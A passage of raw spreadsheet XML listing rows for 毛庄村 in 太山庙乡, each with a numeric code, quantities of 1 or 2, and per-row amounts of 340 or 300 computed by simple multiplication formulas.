      <c r="J2237" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2237" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2238" ht="23" customHeight="1" spans="1:11">
      <c r="A2238" s="13" t="s">
        <v>5896</v>
      </c>
      <c r="B2238" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2238" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2238" s="14" t="s">
        <v>5897</v>
      </c>
      <c r="E2238" s="14" t="s">
        <v>5758</v>
      </c>
      <c r="F2238" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2238" s="14">
        <v>1</v>
      </c>
      <c r="H2238" s="14">
        <v>340</v>
      </c>
      <c r="I2238" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2238" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2238" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2239" ht="23" customHeight="1" spans="1:11">
      <c r="A2239" s="13" t="s">
        <v>5898</v>
      </c>
      <c r="B2239" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2239" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2239" s="14" t="s">
        <v>5899</v>
      </c>
      <c r="E2239" s="14" t="s">
        <v>5738</v>
      </c>
      <c r="F2239" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2239" s="14">
        <v>1</v>
      </c>
      <c r="H2239" s="14">
        <v>340</v>
      </c>
      <c r="I2239" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2239" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2239" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2240" ht="23" customHeight="1" spans="1:11">
      <c r="A2240" s="13" t="s">
        <v>5900</v>
      </c>
      <c r="B2240" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2240" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2240" s="14" t="s">
        <v>5901</v>
      </c>
      <c r="E2240" s="14" t="s">
        <v>5902</v>
      </c>
      <c r="F2240" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2240" s="14">
        <v>1</v>
      </c>
      <c r="H2240" s="14">
        <v>340</v>
      </c>
      <c r="I2240" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2240" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2240" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2241" ht="23" customHeight="1" spans="1:11">
      <c r="A2241" s="13" t="s">
        <v>5903</v>
      </c>
      <c r="B2241" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2241" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2241" s="13" t="s">
        <v>5904</v>
      </c>
      <c r="E2241" s="20" t="s">
        <v>5694</v>
      </c>
      <c r="F2241" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2241" s="14">
        <v>1</v>
      </c>
      <c r="H2241" s="14">
        <v>340</v>
      </c>
      <c r="I2241" s="14">
        <f t="shared" si="107"/>
        <v>340</v>
      </c>
      <c r="J2241" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2241" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2242" ht="23" customHeight="1" spans="1:11">
      <c r="A2242" s="13" t="s">
        <v>5905</v>
      </c>
      <c r="B2242" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2242" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2242" s="14" t="s">
        <v>5906</v>
      </c>
      <c r="E2242" s="14" t="s">
        <v>5588</v>
      </c>
      <c r="F2242" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2242" s="14">
        <v>2</v>
      </c>
      <c r="H2242" s="14">
        <v>300</v>
      </c>
      <c r="I2242" s="14">
        <f t="shared" si="107"/>
        <v>600</v>
      </c>
      <c r="J2242" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2242" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2243" ht="23" customHeight="1" spans="1:11">
      <c r="A2243" s="13" t="s">
        <v>5907</v>
      </c>
      <c r="B2243" s="14" t="str">
        <f>B2242</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2243" s="14" t="str">
        <f>C2242</f>
        <v>毛庄村</v>
      </c>
      <c r="D2243" s="13" t="s">
        <v>5908</v>
      </c>
      <c r="E2243" s="13" t="s">
        <v>3365</v>
      </c>
      <c r="F2243" s="14">
        <f>F2242</f>
        <v>4113210704</v>
      </c>
      <c r="G2243" s="14"/>
      <c r="H2243" s="14"/>
      <c r="I2243" s="14"/>
      <c r="J2243" s="14"/>
      <c r="K2243" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2244" ht="23" customHeight="1" spans="1:11">
      <c r="A2244" s="13" t="s">
        <v>5909</v>
      </c>
      <c r="B2244" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2244" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2244" s="14" t="s">
        <v>5910</v>
      </c>
      <c r="E2244" s="14" t="s">
        <v>5636</v>
      </c>
      <c r="F2244" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2244" s="14">
        <v>2</v>
      </c>
      <c r="H2244" s="14">
        <v>300</v>
      </c>
      <c r="I2244" s="14">
        <f>H2244*G2244</f>
        <v>600</v>
      </c>
      <c r="J2244" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2244" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2245" ht="23" customHeight="1" spans="1:11">
      <c r="A2245" s="13" t="s">
        <v>5911</v>
      </c>
      <c r="B2245" s="14" t="str">
        <f>B2244</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2245" s="14" t="str">
        <f>C2244</f>
        <v>毛庄村</v>
      </c>
      <c r="D2245" s="13" t="s">
        <v>5912</v>
      </c>
      <c r="E2245" s="13" t="s">
        <v>5913</v>
      </c>
      <c r="F2245" s="14">
        <f>F2244</f>
        <v>4113210704</v>
      </c>
      <c r="G2245" s="14"/>
      <c r="H2245" s="14"/>
      <c r="I2245" s="14"/>
      <c r="J2245" s="14"/>
      <c r="K2245" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2246" ht="23" customHeight="1" spans="1:11">
      <c r="A2246" s="13" t="s">
        <v>5914</v>
      </c>
      <c r="B2246" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2246" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2246" s="14" t="s">
        <v>5915</v>
      </c>
      <c r="E2246" s="14" t="s">
        <v>5916</v>
      </c>
      <c r="F2246" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2246" s="14">
        <v>2</v>
      </c>
      <c r="H2246" s="14">
        <v>300</v>
      </c>
      <c r="I2246" s="14">
        <f>H2246*G2246</f>
        <v>600</v>
      </c>
      <c r="J2246" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2246" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2247" ht="23" customHeight="1" spans="1:11">
      <c r="A2247" s="13" t="s">
        <v>5917</v>
      </c>
      <c r="B2247" s="14" t="str">
        <f>B2246</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2247" s="14" t="str">
        <f>C2246</f>
        <v>毛庄村</v>
      </c>
      <c r="D2247" s="13" t="s">
        <v>5918</v>
      </c>
      <c r="E2247" s="13" t="s">
        <v>5919</v>
      </c>
      <c r="F2247" s="14">
        <f>F2246</f>
        <v>4113210704</v>
      </c>
      <c r="G2247" s="14"/>
      <c r="H2247" s="14"/>
      <c r="I2247" s="14"/>
      <c r="J2247" s="14"/>
      <c r="K2247" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2248" ht="23" customHeight="1" spans="1:11">
      <c r="A2248" s="13" t="s">
        <v>5920</v>
      </c>
      <c r="B2248" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2248" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2248" s="14" t="s">
        <v>5921</v>
      </c>
      <c r="E2248" s="14" t="s">
        <v>5685</v>
      </c>
      <c r="F2248" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2248" s="14">
        <v>2</v>
      </c>
      <c r="H2248" s="14">
        <v>300</v>
      </c>
      <c r="I2248" s="14">
        <f>H2248*G2248</f>
        <v>600</v>
      </c>
      <c r="J2248" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2248" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2249" ht="23" customHeight="1" spans="1:11">
      <c r="A2249" s="13" t="s">
        <v>5922</v>
      </c>
      <c r="B2249" s="14" t="str">
        <f>B2248</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2249" s="14" t="str">
        <f>C2248</f>
        <v>毛庄村</v>
      </c>
      <c r="D2249" s="13" t="s">
        <v>5923</v>
      </c>
      <c r="E2249" s="13" t="s">
        <v>5924</v>
      </c>
      <c r="F2249" s="14">
        <f>F2248</f>
        <v>4113210704</v>
      </c>
      <c r="G2249" s="14"/>
      <c r="H2249" s="14"/>
      <c r="I2249" s="14"/>
      <c r="J2249" s="14"/>
      <c r="K2249" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2250" ht="23" customHeight="1" spans="1:11">
      <c r="A2250" s="13" t="s">
        <v>5925</v>
      </c>
      <c r="B2250" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2250" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2250" s="14" t="s">
        <v>5926</v>
      </c>
      <c r="E2250" s="14" t="s">
        <v>5735</v>
      </c>
      <c r="F2250" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2250" s="14">
        <v>2</v>
      </c>
      <c r="H2250" s="14">
        <v>300</v>
      </c>
      <c r="I2250" s="14">
        <f>H2250*G2250</f>
        <v>600</v>
      </c>
      <c r="J2250" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2250" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2251" ht="23" customHeight="1" spans="1:11">
      <c r="A2251" s="13" t="s">
        <v>5927</v>
      </c>
      <c r="B2251" s="14" t="str">
        <f>B2250</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2251" s="14" t="str">
        <f>C2250</f>
        <v>毛庄村</v>
      </c>
      <c r="D2251" s="13" t="s">
        <v>5928</v>
      </c>
      <c r="E2251" s="20" t="s">
        <v>5738</v>
      </c>
      <c r="F2251" s="14">
        <f>F2250</f>
        <v>4113210704</v>
      </c>
      <c r="G2251" s="14"/>
      <c r="H2251" s="14"/>
      <c r="I2251" s="14"/>
      <c r="J2251" s="14"/>
      <c r="K2251" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2252" ht="23" customHeight="1" spans="1:11">
      <c r="A2252" s="13" t="s">
        <v>5929</v>
      </c>
      <c r="B2252" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2252" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2252" s="14" t="s">
        <v>5930</v>
      </c>
      <c r="E2252" s="14" t="s">
        <v>5931</v>
      </c>
      <c r="F2252" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2252" s="14">
        <v>1</v>
      </c>
      <c r="H2252" s="14">
        <v>340</v>
      </c>
      <c r="I2252" s="14">
        <f t="shared" ref="I2252:I2259" si="108">H2252*G2252</f>
        <v>340</v>
      </c>
      <c r="J2252" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2252" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2253" ht="23" customHeight="1" spans="1:11">
      <c r="A2253" s="13" t="s">
        <v>5932</v>
      </c>
      <c r="B2253" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2253" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2253" s="14" t="s">
        <v>5933</v>
      </c>
      <c r="E2253" s="14" t="s">
        <v>5202</v>
      </c>
      <c r="F2253" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2253" s="14">
        <v>1</v>
      </c>
      <c r="H2253" s="14">
        <v>340</v>
      </c>
      <c r="I2253" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2253" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2253" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2254" ht="23" customHeight="1" spans="1:11">
      <c r="A2254" s="13" t="s">
        <v>5934</v>
      </c>
      <c r="B2254" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2254" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2254" s="14" t="s">
        <v>5935</v>
      </c>
      <c r="E2254" s="14" t="s">
        <v>5874</v>
      </c>
      <c r="F2254" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2254" s="14">
        <v>1</v>
      </c>
      <c r="H2254" s="14">
        <v>340</v>
      </c>
      <c r="I2254" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2254" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2254" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2255" ht="23" customHeight="1" spans="1:11">
      <c r="A2255" s="13" t="s">
        <v>5936</v>
      </c>
      <c r="B2255" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2255" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2255" s="14" t="s">
        <v>5937</v>
      </c>
      <c r="E2255" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2255" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2255" s="14">
        <v>1</v>
      </c>
      <c r="H2255" s="14">
        <v>340</v>
      </c>
      <c r="I2255" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2255" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2255" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2256" ht="23" customHeight="1" spans="1:11">
      <c r="A2256" s="13" t="s">
        <v>5938</v>
      </c>
      <c r="B2256" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2256" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2256" s="14" t="s">
        <v>5939</v>
      </c>
      <c r="E2256" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2256" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2256" s="14">
        <v>1</v>
      </c>
      <c r="H2256" s="14">
        <v>340</v>
      </c>
      <c r="I2256" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2256" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2256" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2257" ht="23" customHeight="1" spans="1:11">
      <c r="A2257" s="13" t="s">
        <v>5940</v>
      </c>
      <c r="B2257" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2257" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2257" s="14" t="s">
        <v>5941</v>
      </c>
      <c r="E2257" s="14" t="s">
        <v>5665</v>
      </c>
      <c r="F2257" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2257" s="14">
        <v>1</v>
      </c>
      <c r="H2257" s="14">
        <v>340</v>
      </c>
      <c r="I2257" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2257" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2257" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2258" ht="23" customHeight="1" spans="1:11">
      <c r="A2258" s="13" t="s">
        <v>5942</v>
      </c>
      <c r="B2258" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2258" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2258" s="14" t="s">
        <v>5943</v>
      </c>
      <c r="E2258" s="14" t="s">
        <v>5662</v>
      </c>
      <c r="F2258" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2258" s="14">
        <v>1</v>
      </c>
      <c r="H2258" s="14">
        <v>340</v>
      </c>
      <c r="I2258" s="14">
        <f t="shared" si="108"/>
        <v>340</v>
      </c>
      <c r="J2258" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2258" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2259" ht="23" customHeight="1" spans="1:11">
      <c r="A2259" s="13" t="s">
        <v>5944</v>
      </c>
      <c r="B2259" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2259" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2259" s="14" t="s">
        <v>5945</v>
      </c>
      <c r="E2259" s="14" t="s">
        <v>2282</v>
      </c>
      <c r="F2259" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2259" s="14">
        <v>2</v>
      </c>
      <c r="H2259" s="14">
        <v>300</v>
      </c>
      <c r="I2259" s="14">
        <f t="shared" si="108"/>
        <v>600</v>
      </c>
      <c r="J2259" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2259" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2260" ht="23" customHeight="1" spans="1:11">
      <c r="A2260" s="13" t="s">
        <v>5946</v>
      </c>
      <c r="B2260" s="14" t="str">
        <f>B2259</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2260" s="14" t="str">
        <f>C2259</f>
        <v>毛庄村</v>
      </c>
      <c r="D2260" s="13" t="s">
        <v>5947</v>
      </c>
      <c r="E2260" s="13" t="s">
        <v>5600</v>
      </c>
      <c r="F2260" s="14">
        <f>F2259</f>
        <v>4113210704</v>
      </c>
      <c r="G2260" s="14"/>
      <c r="H2260" s="14"/>
      <c r="I2260" s="14"/>
      <c r="J2260" s="14"/>
      <c r="K2260" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2261" ht="23" customHeight="1" spans="1:11">
      <c r="A2261" s="13" t="s">
        <v>5948</v>
      </c>
      <c r="B2261" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2261" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2261" s="14" t="s">
        <v>5949</v>
      </c>
      <c r="E2261" s="14" t="s">
        <v>5710</v>
      </c>
      <c r="F2261" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2261" s="14">
        <v>1</v>
      </c>
      <c r="H2261" s="14">
        <v>340</v>
      </c>
      <c r="I2261" s="14">
        <f>H2261*G2261</f>
        <v>340</v>
      </c>
      <c r="J2261" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2261" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2262" ht="23" customHeight="1" spans="1:11">
      <c r="A2262" s="13" t="s">
        <v>5950</v>
      </c>
      <c r="B2262" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2262" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2262" s="14" t="s">
        <v>5951</v>
      </c>
      <c r="E2262" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2262" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2262" s="14">
        <v>2</v>
      </c>
      <c r="H2262" s="14">
        <v>300</v>
      </c>
      <c r="I2262" s="14">
        <f>H2262*G2262</f>
        <v>600</v>
      </c>
      <c r="J2262" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2262" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2263" ht="23" customHeight="1" spans="1:11">
      <c r="A2263" s="13" t="s">
        <v>5952</v>
      </c>
      <c r="B2263" s="14" t="str">
        <f>B2262</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2263" s="14" t="str">
        <f>C2262</f>
        <v>毛庄村</v>
      </c>
      <c r="D2263" s="13" t="s">
        <v>5953</v>
      </c>
      <c r="E2263" s="13" t="s">
        <v>5575</v>
      </c>
      <c r="F2263" s="14">
        <f>F2262</f>
        <v>4113210704</v>
      </c>
      <c r="G2263" s="14"/>
      <c r="H2263" s="14"/>
      <c r="I2263" s="14"/>
      <c r="J2263" s="14"/>
      <c r="K2263" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2264" ht="23" customHeight="1" spans="1:11">
      <c r="A2264" s="13" t="s">
        <v>5954</v>
      </c>
      <c r="B2264" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2264" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2264" s="14" t="s">
        <v>5955</v>
      </c>
      <c r="E2264" s="14" t="s">
        <v>5675</v>
      </c>
      <c r="F2264" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2264" s="14">
        <v>1</v>
      </c>
      <c r="H2264" s="14">
        <v>340</v>
      </c>
      <c r="I2264" s="14">
        <f>H2264*G2264</f>
        <v>340</v>
      </c>
      <c r="J2264" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2264" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2265" ht="23" customHeight="1" spans="1:11">
      <c r="A2265" s="13" t="s">
        <v>5956</v>
      </c>
      <c r="B2265" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2265" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2265" s="14" t="s">
        <v>5957</v>
      </c>
      <c r="E2265" s="14" t="s">
        <v>5675</v>
      </c>
      <c r="F2265" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2265" s="14">
        <v>2</v>
      </c>
      <c r="H2265" s="14">
        <v>300</v>
      </c>
      <c r="I2265" s="14">
        <f>H2265*G2265</f>
        <v>600</v>
      </c>
      <c r="J2265" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2265" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2266" ht="23" customHeight="1" spans="1:11">
      <c r="A2266" s="13" t="s">
        <v>5958</v>
      </c>
      <c r="B2266" s="14" t="str">
        <f>B2265</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2266" s="14" t="str">
        <f>C2265</f>
        <v>毛庄村</v>
      </c>
      <c r="D2266" s="13" t="s">
        <v>5959</v>
      </c>
      <c r="E2266" s="13" t="s">
        <v>5724</v>
      </c>
      <c r="F2266" s="14">
        <f>F2265</f>
        <v>4113210704</v>
      </c>
      <c r="G2266" s="14"/>
      <c r="H2266" s="14"/>
      <c r="I2266" s="14"/>
      <c r="J2266" s="14"/>
      <c r="K2266" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2267" ht="23" customHeight="1" spans="1:11">
      <c r="A2267" s="13" t="s">
        <v>5960</v>
      </c>
      <c r="B2267" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2267" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2267" s="14" t="s">
        <v>5961</v>
      </c>
      <c r="E2267" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2267" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2267" s="14">
        <v>2</v>
      </c>
      <c r="H2267" s="14">
        <v>300</v>
      </c>
      <c r="I2267" s="14">
        <f>H2267*G2267</f>
        <v>600</v>
      </c>
      <c r="J2267" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2267" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2268" ht="23" customHeight="1" spans="1:11">
      <c r="A2268" s="13" t="s">
        <v>5962</v>
      </c>
      <c r="B2268" s="14" t="str">
        <f>B2267</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2268" s="14" t="str">
        <f>C2267</f>
        <v>毛庄村</v>
      </c>
      <c r="D2268" s="13" t="s">
        <v>5963</v>
      </c>
      <c r="E2268" s="13" t="s">
        <v>5964</v>
      </c>
      <c r="F2268" s="14">
        <f>F2267</f>
        <v>4113210704</v>
      </c>
      <c r="G2268" s="14"/>
      <c r="H2268" s="14"/>
      <c r="I2268" s="14"/>
      <c r="J2268" s="14"/>
      <c r="K2268" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2269" ht="23" customHeight="1" spans="1:11">
      <c r="A2269" s="13" t="s">
        <v>5965</v>
      </c>
      <c r="B2269" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2269" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2269" s="14" t="s">
        <v>5966</v>
      </c>
      <c r="E2269" s="14" t="s">
        <v>5967</v>
      </c>
      <c r="F2269" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2269" s="14">
        <v>1</v>
      </c>
      <c r="H2269" s="14">
        <v>340</v>
      </c>
      <c r="I2269" s="14">
        <f t="shared" ref="I2269:I2282" si="109">H2269*G2269</f>
        <v>340</v>
      </c>
      <c r="J2269" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2269" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2270" ht="23" customHeight="1" spans="1:11">
      <c r="A2270" s="13" t="s">
        <v>5968</v>
      </c>
      <c r="B2270" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2270" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2270" s="14" t="s">
        <v>5969</v>
      </c>
      <c r="E2270" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2270" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2270" s="14">
        <v>1</v>
      </c>
      <c r="H2270" s="14">
        <v>340</v>
      </c>
      <c r="I2270" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2270" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2270" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2271" ht="23" customHeight="1" spans="1:11">
      <c r="A2271" s="13" t="s">
        <v>5970</v>
      </c>
      <c r="B2271" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2271" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2271" s="14" t="s">
        <v>5971</v>
      </c>
      <c r="E2271" s="14" t="s">
        <v>5972</v>
      </c>
      <c r="F2271" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2271" s="14">
        <v>1</v>
      </c>
      <c r="H2271" s="14">
        <v>340</v>
      </c>
      <c r="I2271" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2271" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2271" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2272" ht="23" customHeight="1" spans="1:11">
      <c r="A2272" s="13" t="s">
        <v>5973</v>
      </c>
      <c r="B2272" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2272" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2272" s="14" t="s">
        <v>5879</v>
      </c>
      <c r="E2272" s="14" t="s">
        <v>5701</v>
      </c>
      <c r="F2272" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2272" s="14">
        <v>1</v>
      </c>
      <c r="H2272" s="14">
        <v>340</v>
      </c>
      <c r="I2272" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2272" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2272" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2273" ht="23" customHeight="1" spans="1:11">
      <c r="A2273" s="13" t="s">
        <v>5974</v>
      </c>
      <c r="B2273" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2273" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2273" s="14" t="s">
        <v>5975</v>
      </c>
      <c r="E2273" s="14" t="s">
        <v>5668</v>
      </c>
      <c r="F2273" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2273" s="14">
        <v>1</v>
      </c>
      <c r="H2273" s="14">
        <v>340</v>
      </c>
      <c r="I2273" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2273" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2273" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2274" ht="23" customHeight="1" spans="1:11">
      <c r="A2274" s="13" t="s">
        <v>5976</v>
      </c>
      <c r="B2274" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2274" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2274" s="14" t="s">
        <v>5977</v>
      </c>
      <c r="E2274" s="14" t="s">
        <v>5825</v>
      </c>
      <c r="F2274" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2274" s="14">
        <v>1</v>
      </c>
      <c r="H2274" s="14">
        <v>340</v>
      </c>
      <c r="I2274" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2274" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2274" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2275" ht="23" customHeight="1" spans="1:11">
      <c r="A2275" s="13" t="s">
        <v>5978</v>
      </c>
      <c r="B2275" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2275" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2275" s="14" t="s">
        <v>5979</v>
      </c>
      <c r="E2275" s="14" t="s">
        <v>5837</v>
      </c>
      <c r="F2275" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2275" s="14">
        <v>1</v>
      </c>
      <c r="H2275" s="14">
        <v>340</v>
      </c>
      <c r="I2275" s="14">
        <f t="shared" si="109"/>
        <v>340</v>
      </c>
      <c r="J2275" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2275" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2276" ht="23" customHeight="1" spans="1:11">
      <c r="A2276" s="13" t="s">
        <v>5980</v>
      </c>
      <c r="B2276" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2276" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2276" s="14" t="s">
        <v>5981</v>
      </c>
      <c r="E2276" s="14" t="s">
        <v>4067</v>
      </c>
      <c r="F2276" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2276" s="14">
